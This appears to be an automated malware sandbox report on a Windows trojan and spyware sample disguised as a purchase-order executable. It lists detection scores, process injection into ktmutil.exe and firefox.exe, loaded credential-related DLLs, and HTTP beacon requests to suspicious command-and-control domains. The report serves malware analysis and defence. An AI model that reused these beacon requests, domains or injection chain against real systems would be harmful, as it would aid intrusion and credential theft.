Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, MfXsNDEYnYkPrZcmpb.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@16/12

Source: C:\Users\user\Desktop\Details Of Our PO..exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Details Of Our PO..exe.log

Source: Details Of Our PO..exe	Virustotal: Detection: 51%			Perma Link
Source: Details Of Our PO..exe	ReversingLabs: Detection: 52%

Source:	Binary string: wntdll.pdbUGP source: Details Of Our PO..exe, 00000001.00000002.1305230211.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000004.00000003.1304959427.0000000000A23000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000004.00000002.3639639405.0000000003000000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000004.00000002.3639639405.000000000319E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000004.00000003.1308013332.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Details Of Our PO..exe, Details Of Our PO..exe, 00000001.00000002.1305230211.0000000000EF0000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, ktmutil.exe, 00000004.00000003.1304959427.0000000000A23000.00000004.00000020.00020000.00000000.sdmp, ktmutil.exe, 00000004.00000002.3639639405.0000000003000000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000004.00000002.3639639405.000000000319E000.00000040.00001000.00020000.00000000.sdmp, ktmutil.exe, 00000004.00000003.1308013332.0000000000BD5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdbGCTL source: Details Of Our PO..exe, 00000001.00000002.1304752116.0000000000937000.00000004.00000020.00020000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000002.3637599691.000000000092E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ktmutil.pdb source: Details Of Our PO..exe, 00000001.00000002.1304752116.0000000000937000.00000004.00000020.00020000.00000000.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000002.3637599691.000000000092E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: kgiwhJAWTiJvkoTzfbZTr.exe, 00000003.00000000.1226816694.0000000000A7F000.00000002.00000001.01000000.0000000C.sdmp, kgiwhJAWTiJvkoTzfbZTr.exe, 0000000B.00000002.3637340658.0000000000A7F000.00000002.00000001.01000000.0000000C.sdmp

Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4x nop then xor eax, eax		4_2_00509F70
Source: C:\Windows\SysWOW64\ktmutil.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_00C004EE

Source: Network traffic	Suricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 104.21.80.1:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 104.21.80.1:80 -> 192.168.2.4:49749
Source: Network traffic	Suricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 104.21.80.1:80 -> 192.168.2.4:49750
Source: Network traffic	Suricata IDS: 2859622 - Severity 1 - ETPRO EXPLOIT_KIT FoxTDS Initial Check : 104.21.80.1:80 -> 192.168.2.4:49752

Source:	DNS query: www.restrainreflection.xyz
Source:	DNS query: www.melayari.xyz
Source:	DNS query: www.031233793.xyz
Source:	DNS query: www.btcetf.xyz

Source: Joe Sandbox View	IP Address: 144.76.229.203 144.76.229.203
Source: Joe Sandbox View	IP Address: 199.192.23.195 199.192.23.195

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /180h/?oxr=vzuH8N7P9nf&Bz=UzOvCVCfqsud0C/WkrMqcP2RHNbsAaZ8o9tyVTqa4UQoUorKeeDFRYXvu+Maq61THDiQ8APUEXADUp5L/iYhjOK05jeOtPOZBuiYDzf9Kcx8by5e2CyoVAY= HTTP/1.1Host: www.3333bet.websiteAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /el9f/?Bz=gBTjJ3HhuA6Y8oUx+q7BJruz/QnVOwvkMUV75EoY0rHEPotyrFeSFHwEnXZQtqJZGp/pT9EAUiNRhYVokcWj3DMyQWvqWDjgn/yihnZDLS/B0objMfufdC4=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.restrainreflection.xyzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /6ll4/?Bz=4EPGr05mGjSiauGbX7VQ62yH/iG53Dl8IA8brTo02OAzAUan1C0DkP00lQ/2uXHXWR2+wjSsnM8K+XeIsSLFE82vu6FTCqpZjZ1Xn8Uq+onop1dRHcIqw9I=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.reviewsonline.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /nrm5/?Bz=/oERluzzM0pGzAPiM4PWR2qy/B5KhqUS8N6tZO7kvOymG6wHkEScXS4KihZuzroZh6dcbVTqQgiZSCDFHO8BVJlg0C19v26IlqaCVaQEMFWO86YAfJstWpA=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.melayari.xyzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /k12w/?Bz=I6te/k1lbUDv9lUmInG92Y4ZLnEsH0cpjuyXjkObmr6KGlNEilnQgEy9r5056f7AXw2PFRopXOcGWV00u+Ah+2qydIfQMOrdiqqOVs6HK1nq/fOngBW7h60=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.aibay.topAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /ha82/?Bz=t8GdRcIw0FwFpctsohSO+eXMMv6n3j3HolPXkxe8uD6TgII5WqfYhsHRMkcuzf52vTuC2N23TbiUNUOxwiqQJ++/Sr6g/inFfBl2Iar0TBpReq67PNq1j3c=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.031233793.xyzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /8afc/?oxr=vzuH8N7P9nf&Bz=KVtMYsRfNwMvdwBGTmbjTbVxKWEGME8MHLBwnoWB8FqE+U7e+AlwWYsu6uTC9PWkoBdq0NSpn8DuYD4ByIwkH6Prh+Yj6fnOcmfInq2Dm50bNtbBKsVX5kE= HTTP/1.1Host: www.venturegioballng.funAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /mfiy/?Bz=0IFkCdbmSQmD2uscPZm1qLpVXo+OlvxIcim3EGA2+6tPYtfl1Y4J2bovDCnjA/J4AvZpuEqsscdvcun9q3T0DRbWHDkLpMI9ksov5OHLKPkrw4+Y4XDycBE=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.uqcdnvgr.bizAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /n7w1/?Bz=sv80E+GBb5G+kJvLhfKHhefcrhH6Ur25+8bFg+5TIx+AYwioddgnSDOF9J3I+7VeP2HfoilVWnkorzDt7ky+QX9uVrZ0CtCHLzZH9N6VQ5XrTfBlxpf2h9U=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.miconion.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /o820/?Bz=0n0qKyUK2peSxCSBB66YbZy7YOM28cwzZ7fY5Elmb8S7ZdGCVRINIMhO5A/sygFaToE4G33M5hneBjK3KfgrzDSeX0FoHMElk95ieuMs3G8Yl1qXIrmqk7s=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.chillrocket.topAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /mlo1/?Bz=IfONekum+z06T0s2BK7rknpoaYzKqjBUI/afBYbGYqNxNS3gO/R476nmBH3br7pvBiWtavfILBb5Tnp6k9C4k0TCb4hjIaYg+2HUu8mbTBumq74K0MzSNso=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.btcetf.xyzAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /3ujc/?Bz=9jA6gDHEOaO+WXBpyrwfxueCOwGw/wmolW6noVBcEa1vE91JFnV2Ay7j0xeI/wg/WKXIb0WqB7dxxO1/Ldl8oKEHXUy3QnzjcvB58LQcL0OjWI5eopWteOk=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.eczanem.shopAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /ysql/?oxr=vzuH8N7P9nf&Bz=MK+gaqCdeM2a79iFj6ZsYH6MQK1E4vUbphgPjlpFoiR4jnFQIzXQ8twRdYLl9qrO7HrhnQhBzh8VLlrAqD0D8txJeLmDgYMypG/RIOr1AuueRHaY3968pGg= HTTP/1.1Host: www.mbalib.comAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /lhqx/?Bz=fKq8cJKQ1+x3R9+W4cFGWFxk+op7D8ljzdfmmmi/a/wBvbTF7KqGwgc/lSbuPXPnMrNsqlbGkCBAwDgfLh5Y2t9l7pJEF7hYSBJ+V6MYpVslqnB5FhwD88c=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.celadonassn.netAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /iveg/?Bz=0qmA2LPMhkAipH4BrQ7tytYF8N5D6Q5E1bC9i5y1EQ9My6wnDm5mIzcV6Ixfg8ax9KV/gLNUYLwMqNxHCF4vLc4hr8RDC+vQxaT2fdmkW7Uu1uzA/xYu59w=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.nkq.infoAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic	HTTP traffic detected: GET /8u15/?Bz=zJGTfjuA56RhR7bV5btEuaPO+sRVNcKtSshskeNEfXZx+wKjIJBG71TQHM+ju47VGGVsU4Ha1kULI3jP0sJC+PGOhWLKycixNKjgYctIH6cJwmuVVfDO1yY=&oxr=vzuH8N7P9nf HTTP/1.1Host: www.skingraphica.netAccept: /Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SV1; [eburo v4.0]; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)

Source: global traffic	DNS traffic detected: DNS query: www.3333bet.website
Source: global traffic	DNS traffic detected: DNS query: www.restrainreflection.xyz
Source: global traffic	DNS traffic detected: DNS query: www.reviewsonline.shop
Source: global traffic	DNS traffic detected: DNS query: www.melayari.xyz
Source: global traffic	DNS traffic detected: DNS query: www.aibay.top
Source: global traffic	DNS traffic detected: DNS query: www.031233793.xyz
Source: global traffic	DNS traffic detected: DNS query: www.venturegioballng.fun
Source: global traffic	DNS traffic detected: DNS query: www.uqcdnvgr.biz
Source: global traffic	DNS traffic detected: DNS query: www.miconion.shop
Source: global traffic	DNS traffic detected: DNS query: www.chillrocket.top
Source: global traffic	DNS traffic detected: DNS query: www.btcetf.xyz
Source: global traffic	DNS traffic detected: DNS query: www.eczanem.shop
Source: global traffic	DNS traffic detected: DNS query: www.mbalib.com
Source: global traffic	DNS traffic detected: DNS query: www.celadonassn.net
Source: global traffic	DNS traffic detected: DNS query: www.nkq.info
Source: global traffic	DNS traffic detected: DNS query: www.skingraphica.net

Source: unknown	Process created: C:\Users\user\Desktop\Details Of Our PO..exe "C:\Users\user\Desktop\Details Of Our PO..exe"
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process created: C:\Users\user\Desktop\Details Of Our PO..exe "C:\Users\user\Desktop\Details Of Our PO..exe"
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"
Source: C:\Windows\SysWOW64\ktmutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Process created: C:\Users\user\Desktop\Details Of Our PO..exe "C:\Users\user\Desktop\Details Of Our PO..exe"	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Process created: C:\Windows\SysWOW64\ktmutil.exe "C:\Windows\SysWOW64\ktmutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\ktmutil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: 0.2.Details Of Our PO..exe.32d6fbc.1.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Source: 0.2.Details Of Our PO..exe.a500000.7.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	.Net Code: LZO5uZvVbN System.Reflection.Assembly.Load(byte[])
Source: 0.2.Details Of Our PO..exe.4cb61b8.5.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	.Net Code: LZO5uZvVbN System.Reflection.Assembly.Load(byte[])
Source: 0.2.Details Of Our PO..exe.4d40fd8.4.raw.unpack, N6Vo3p1v0BooWZZpdw.cs	.Net Code: LZO5uZvVbN System.Reflection.Assembly.Load(byte[])
Source: 0.2.Details Of Our PO..exe.9860000.6.raw.unpack, dTuvtD1DdyQbwj9dR3.cs	.Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_012B1E7A push cs; retf	0_2_012B1E8D
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 0_2_0A25DDD5 push FFFFFF8Bh; iretd	0_2_0A25DDD7
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0042D853 push ds; ret	1_2_0042D916
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0041B0C9 push cs; retf	1_2_0041B0D1
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_004189B9 push ecx; ret	1_2_004189C0
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00401560 push ss; retn 4683h	1_2_00401691
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00403650 push eax; ret	1_2_00403652
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0040AECC push es; ret	1_2_0040AEE4
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_0041EEED push edi; iretd	1_2_0041EEEF
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00414EF6 push esi; iretd	1_2_00414EF7
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00426F53 push ecx; ret	1_2_00426FAC
Source: C:\Users\user\Desktop\Details Of Our PO..exe	Code function: 1_2_00F209AD push ecx; mov dword ptr [esp], ecx	1_2_00F209B6
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_033107CC push ecx; ret	3_2_033107D3
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_03312EDC push cs; retf	3_2_03312EE4
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_03316D00 push edi; iretd	3_2_03316D02
Source: C:\Program Files (x86)\IidvLcMMkvbIslETRzkgmNDucNVfPEsjfxABVOgTmGsP\kgiwhJAWTiJvkoTzfbZTr.exe	Code function: 3_2_0330CD09 push esi; iretd	3_2_0330CD0A
